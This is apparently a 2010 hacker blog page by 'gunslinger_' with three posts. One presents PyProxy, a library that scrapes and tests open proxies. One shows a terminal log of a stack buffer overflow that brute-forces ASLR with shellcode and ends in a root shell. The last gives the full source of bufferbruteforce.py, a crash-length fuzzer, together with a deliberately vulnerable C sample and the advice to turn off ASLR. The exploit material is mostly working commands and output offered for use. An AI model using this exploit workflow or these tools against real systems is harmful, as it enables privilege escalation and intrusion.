break a time, with break the c0de…

Posts tagged “Tools

PyProxy | Proxy Hunter and Tester, A high-level cross-protocol proxy-hunter python library


This idea is taken after doing any research with some socket. and finally, i need some proxy for it’s research .
so i’m going to make something to parse proxy in every site and has a proxy checker ability
and i need to use / import that dinamically for the research, so i must play with the object too .

This article will introduce a python library has done by me
the name is PyProxy .
PyProxy is a Proxy Hunter and Tester, A high-level cross-protocol proxy-hunter python library
This is can be use by direct or you can import this to your program

for direct use , you just need to execute this library . you will see the help module along with the library
by adding -h or –help in first argument

PyProxy v.09 by Gunslinger_ <yudha.gunslinger@gmail.com> - Proxy Hunter and Tester Opensource engine
A high-level cross-protocol proxy-hunter

Usage: pyproxy.py [options]

Options:
  -h, --help            show this help message and exit
  -s, --samair          just use samair.ru to hunt proxies
  -l, --sitelist        use all site in the list
  -t, --test            test all proxy !
  -a, --all             do all !
  -v, --version         print current proxy hunter version
  -d, --debug           debug program for more talkable & every proxy will be
                        print to screen
  -o FILE, --outputfile=FILE
                        output proxy will be print
                        [default : proxylist.txt]
  -i FILE, --inputfile=FILE
                        input proxy will be checked
                        [default : proxylist.txt]
  -g FILE, --outputgood=FILE
                        output all good proxy will be saved
                        [default : goodproxy.txt]
  -c NUMBER, --timeout=NUMBER
                        timeout connections being program run
                        [default : 30]

  Example :
    pyproxy.py -s                   | Gather proxy with samair.ru
    pyproxy.py -l                   | Gather proxy in the url list
    pyproxy.py -t proxylist.txt     | Test proxy inside proxylist.txt
    pyproxy.py -a                   | Do all
    pyproxy.py -v                   | Print current version

for advance user / python programmer .
we can use it in PyShell too by import them inside

gunslinger@c0debreaker:~/python/lib$ python
Python 2.6.2 (release26-maint, Apr 19 2009, 01:56:41) 
[GCC 4.3.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import pyproxy
>>> help(pyproxy)
Help on module pyproxy:

NAME
    pyproxy

FILE
    /home/gunslinger/python/module/pyproxy/pyproxy.py

DESCRIPTION
    # -*- coding: utf-8 -*-
    #   This library is free software; you can redistribute it and/or
    #   modify it under the terms of the GNU Lesser General Public
    #   License as published by the Free Software Foundation; either
    #   version 2.1 of the License, or (at your option) any later version.
    #
    #   This library is distributed in the hope that it will be useful,
    #   but WITHOUT ANY WARRANTY; without even the implied warranty of
    #   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
    #   Lesser General Public License for more details.
    #
    #   You should have received a copy of the GNU Lesser General Public
    #   License along with this library; if not, write to the 
    #      Free Software Foundation, Inc., 
    #      59 Temple Place, Suite 330, 
    #      Boston, MA  02111-1307  USA
    #
    #   Copyright 2010 Gunslinger_ <yudha.gunslinger@gmail.com>
    #   http://bit.ly/c0debreaker

CLASSES
    __builtin__.object
        proxyhunter
        runengine
    
    class proxyhunter(__builtin__.object)
     |  Instance variables:
     |   
     |  Outputproxy
     |          Output file every proxy will be printed in
     |          Default : proxylist.txt
     |  
     |  Goodproxy
     |          Output file all good proxy will be print
     |          Default : goodproxylist.txt
     |  
     |  Verbose
     |          More noise, every proxy will be print into screen
     |          Default : True
     |  Timeout
     |          Timeout every test proxy connections in socket
     |          Default : 30
     |  
     |  Sitelist
     |          Proxy site for parsing proxy
     |          Default : []
     |  
     |  Methods defined here:
     |  
     |  Cleanitup(self, sorted_output='uniqueproxylist.txt')
     |      proxy will be printed in uniqueproxylist.txt by default
     |  
     |  CoreFreshTester(self, proxy)
     |  
     |  LoadProxy(self)
     |  
     |  MainFreshTester(self, proxy)
     |  
     |  ParseProxy(self, site)
     |  
     |  Samairdotru(self)
     |  
     |  Single(self)
     |  
     |  TestProxy(self)
     |  
     |  __init__(self, OutputProxy='proxylist.txt', GoodProxy='goodproxylist.txt', Verbose=True, TimeOut=30, Sitelist=[])
     |  
     |  ----------------------------------------------------------------------
     |  Data descriptors defined here:
     |  
     |  __dict__
     |      dictionary for instance variables (if defined)
     |  
     |  __weakref__
     |      list of weak references to the object (if defined)
    
    class runengine(__builtin__.object)
     |  Methods defined here:
     |  
     |  __init__(self)
     |  
     |  parseoption(self)
     |  
     |  printversion(self)
     |  
     |  run(self)
     |  
     |  ----------------------------------------------------------------------
     |  Data descriptors defined here:
     |  
     |  __dict__
     |      dictionary for instance variables (if defined)
     |  
     |  __weakref__
     |      list of weak references to the object (if defined)

FUNCTIONS
    main()

DATA
    __author__ = 'Gunslinger_ <yudha.gunslinger@gmail.com>'
    __copyright__ = 'Copyright (c) 2010 Gunslinger_'
    __date__ = 'Thu Oct  7 00:00:41 2010'
    __version__ = '09'
    __warningregistry__ = {('the sets module is deprecated', <type 'except...

VERSION
    09

DATE
    Thu Oct  7 00:00:41 2010

AUTHOR
    Gunslinger_ <yudha.gunslinger@gmail.com>

(END) q

Need parse proxy in any site ? simply like this

>>> ph = pyproxy.proxyhunter()
>>> ph.ParseProxy("http://aliveproxy.com/high-anonymity-proxy-list/")
[*] Parse proxy from aliveproxy.com/high-anonymity-proxy-list/
218.182.134.23:8080
210.158.6.201:8080
174.142.24.201:3128
217.23.137.56:80
174.142.104.57:3128
205.213.195.70:8080
174.142.24.203:3128
174.142.24.205:3128
24.155.96.93:0080
174.142.24.204:3128
[*] 10 Proxies receieved from : aliveproxy.com/high-anonymity-proxy-list/ 

This module can be use for proxy testing too

>>> import pyproxy
>>> ph = pyproxy.proxyhunter(GoodProxy="goodproxylist.txt")
>>> ph.LoadProxy()
[*] File successfully loaded...
>>> ph.TestProxy()
Error : <urlopen error [Errno 111] Connection refused>
[*] 218.182.134.23:8080 
 '--------------> Bad
Error : <urlopen error [Errno 111] Connection refused>
[*] 210.158.6.201:8080 
 '--------------> Bad
Date: Fri, 08 Oct 2010 12:56:21 GMT
Server: gws
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-XSS-Protection: 1; mode=block
Set-Cookie: PREF=ID=3b034e546cd351bf:TM=1286542581:LM=1286542581:S=EmivqSAOZBhj22iF; expires=Sun, 07-Oct-2012 12:56:21 GMT; path=/; domain=.google.ca
Set-Cookie: NID=39=AQ2UnSEV0xbVMzzwrlcIhBN6dBszmQNIrHgh_iggOQh2JB8pBqz8bIrsxWQv-YX_6jaB3HlMJ7U1ghKURQyUM5evLmenr8vy9ByPZcVM-rkOGsf6nMNxxLQST1SkyJZK; expires=Sat, 09-Apr-2011 12:56:21 GMT; path=/; domain=.google.ca; HttpOnly
Connection: close
Transfer-Encoding: chunked

...
[*] 174.142.24.201:3128 
 '--------------> Good
[*] All Fresh proxy has been saved in goodproxylist.txt
>>> 

doesn’t need more noise ? take down the Verbose variable to False

>>> ph = pyproxy.proxyhunter(GoodProxy="goodproxylist.txt", Verbose=False)
>>> ph.LoadProxy()
[*] File successfully loaded...
>>> ph.TestProxy()
[*] 218.182.134.23:8080 
 '--------------> Good
[*] 210.158.6.201:8080 
 '--------------> Good
[*] 174.142.24.201:3128 
 '--------------> Good
[*] 217.23.137.56:80 
 '--------------> Good
[*] 174.142.104.57:3128 
 '--------------> Good
[*] 205.213.195.70:8080 
 '--------------> Bad
[*] 174.142.24.203:3128 
 '--------------> Good
[*] 174.142.24.205:3128 
 '--------------> Good
[*] 24.155.96.93:0080 
 '--------------> Bad
[*] 174.142.24.204:3128 
 '--------------> Good
[*] All Fresh proxy has been saved in goodproxylist.txt
>>> 

For more infomations, you can take a look at the source
you can find the project here https://sourceforge.net/projects/pyproxy/
hope can be useful for you ;)

Advertisements



easy buffer overflow exploitation


This is buffer overflow scenario with ASLR (Address Space Layer Randomization) and using some my tools that’s made so easy…

gunslinger@c0debreaker:~/bof$ cat /proc/sys/kernel/randomize_va_space
2
gunslinger@c0debreaker:~/bof$ ./ron a
The message was: a
Program completed normally!

gunslinger@c0debreaker:~/bof$ ./ron aaa
The message was: aaa
Program completed normally!
gunslinger@c0debreaker:~/bof$ ./bufferbruteforce.py -a /home/gunslinger/bof/ron -s 1 -e 500

Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>

[*] Checking Existing application 					[Ok]
[*] Checking perl 							[Ok]
[*] Preparing for bruteforcing buffer 					[Ok]
[*] buffering on 44 byte(s)
[!] Application got segmentation fault by giving 44 byte(s) into buffer !!

gunslinger@c0debreaker:~/bof$ ./stackbf ron 48
[*] Using return address 0xbfd24880
[*] Environment variable 128 kb
[*] Shellcode size 28 bytes
The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

# id
uid=0(root) gid=1000(gunslinger) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger)
# whoami
root
# uname -a
Linux c0debreaker 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
# exit
gunslinger@c0debreaker:~/bof$

bufferbruteforce.py


This is buffer brute force for test buffer overflow program

#!/usr/bin/python
import sys, time, StringIO, commands, re, os, os.path

'''
	This is buffer brute forcer program, allow you to brute forcing buffer and know how bytes to make got Segmentation fault .
	Written for educational purpose and pentest only. Use it at your own risk .
	Toolname : bufferbruteforce.py
	Author	 : gunslinger_ <yudha.gunslinger@gmail.com>
	date	 : Sun Jul  4 00:58:54 WIT 2010
	You can use this simple bof.c for testing .
	-----------------bof.c-----------------
	#include <stdio.h>
	#include <string.h>

	int main(int argc, char** argv)
	{
		char buffer[400];
		strcpy(buffer, argv[1]);

		return 0;
	}
	------------------EOF------------------
	Example usage :
	root@localhost:/home/gunslinger/bof# cat bof.c
	#include <stdio.h>
	#include <string.h>

	int main(int argc, char** argv)
	{
		char buffer[400];
		strcpy(buffer, argv[1]);

		return 0;
	}
	root@localhost:/home/gunslinger/bof# echo 0 > /proc/sys/kernel/randomize_va_space
	root@localhost:/home/gunslinger/bof# gcc -o bof -g -fno-stack-protector -mpreferred-stack-boundary=2 bof.c
	root@localhost:/home/gunslinger/bof# exit
	gunslinger@localhost:~/bof$ ./bbf.py -a /home/gunslinger/bof/bof -s 1 -e 500

	Buffer brute force
	Programmer : gunslinger_ <yudha.gunslinger@gmail.com>

	[*] Checking Existing application 					[Ok]
	[*] Checking '/proc/sys/kernel/randomize_va_space' 			[Ok]
	[*] Checking null on randomize_va_space 				[Ok]
	[*] Checking perl 							[Ok]
	[*] Preparing for bruteforcing buffer 					[Ok]
	[*] buffering on 404 byte(s)
	[!] Application got segmentation fault by giving 404 byte(s) into buffer !!

	gunslinger@localhost:~/bof$
'''

'''define color'''
green 	= '\033[38m'
red 	= '\033[31m'
reset 	= '\033[0;0m'

name	= sys.argv[0]
fail 	= "[Failure]"
ok 	= "[Ok]"
rvs	= '/proc/sys/kernel/randomize_va_space'

face	= '''
Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>'''

option = '''
Usage: %s [options]
Options: -a, --application    	<path-to-application>   |   Target application for bruteforcing buffer 
         -s, --start      	<int>	          	|   start byte for bruteforcing buffer
         -e, --end  		<int>     	 	|   end byte for bruteforcing buffer
         -h, --help      	<help>          	|   print this help
                                        					
Example: %s -a /home/gunslinger/bufferoverflow/bof -s 0 -e 500
''' % (name,name)


def myface() :
	print face

def helpMe() :
	myface()
	print option
	sys.exit(1)
	
for arg in sys.argv:
	if arg.lower() == '-a' or arg.lower() == '--application':
            app = sys.argv[int(sys.argv[1:].index(arg))+2]
	elif arg.lower() == '-s' or arg.lower() == '--start':
            counter = sys.argv[int(sys.argv[1:].index(arg))+2]
	elif arg.lower() == '-e' or arg.lower() == '--end':
            end = sys.argv[int(sys.argv[1:].index(arg))+2]
	elif arg.lower() == '-h' or arg.lower() == '--help':
        	helpMe()
	elif len(sys.argv) <= 1:
		helpMe()

def checkingexistingfile():
	if os.path.exists(app):
		exfile = green+ok
	else:
		exfile = red+fail
	time.sleep(1)
	print "\n[*] Checking Existing application \t\t\t\t\t%s%s" % (exfile, reset)
	if exfile == red+fail:
		print "[*] Please checking your application target path"
		exit()

def checkrandomize():
	if os.path.exists(rvs):
		exrvs = green+ok
	else:
		exrvs = red+fail
	time.sleep(1)
	print "[*] Checking \'/proc/sys/kernel/randomize_va_space\' \t\t\t%s%s" % (exrvs, reset)
	if exrvs == red+fail:
		quit()
	cat = "cat "+rvs
	result = StringIO.StringIO(commands.getstatusoutput(cat)[1]).read()
	null = re.findall("0", result)
	time.sleep(1)
	if null:
		print "[*] Checking null on randomize_va_space \t\t\t\t%s%s%s" % (green, ok, reset)
		time.sleep(1)
	else:
		print "[*] Checking null on randomize_va_space \t\t\t\t%s%s%s" % (red, fail, reset)	
		print "[*] Please giving null on randomize_va_space by echo 0 > /proc/sys/kernel/randomize_va_space"
		exit()

def checkperl():
	perl = "perl -e \'print \"A\" x 1\'"
	result = StringIO.StringIO(commands.getstatusoutput(perl)[1]).read()
	A = re.findall("A", result)
	if A:
		print "[*] Checking perl \t\t\t\t\t\t\t%s%s%s" % (green, ok, reset)
		time.sleep(1)
	else:
		print "[*] Checking perl \t\t\t\t\t\t\t%s%s%s" % (red, fail, reset)	
		print "[*] Are perl installed on your system ?"
		exit()


def bruteforcebuff():
	global counter
	print "[*] Preparing for bruteforcing buffer \t\t\t\t\t%s%s%s" % (green, ok, reset)
	time.sleep(1)
	while counter <= end :
		try:
			sys.stdout.write("\r[*] buffering on %s%d%s byte(s)" % (red,int(counter),reset))
			sys.stdout.flush()
			args = app+' '+'`perl -e \'print "A" x '+repr(counter)+'\'`'
			SIGSEGV = StringIO.StringIO(commands.getstatusoutput(args)[0]).read()
			segmentation_fault = re.findall("35584", SIGSEGV)
			if segmentation_fault:
				print "\n[!] Application got segmentation fault by giving %s%d%s byte(s) into buffer !!\n" % (red, int(counter), reset)
				break
			counter = int(counter) + 1
		except KeyboardInterrupt:
			print "\n[-] Exiting %s" % (name)
			sys.exit(1)
			
def main():
	myface()
	checkingexistingfile()
	checkrandomize()
	checkperl()
	bruteforcebuff()
	
if __name__ == '__main__':
	main()

buffer brute force python gunslinger_ 0xr00t.com inj3ct0r.com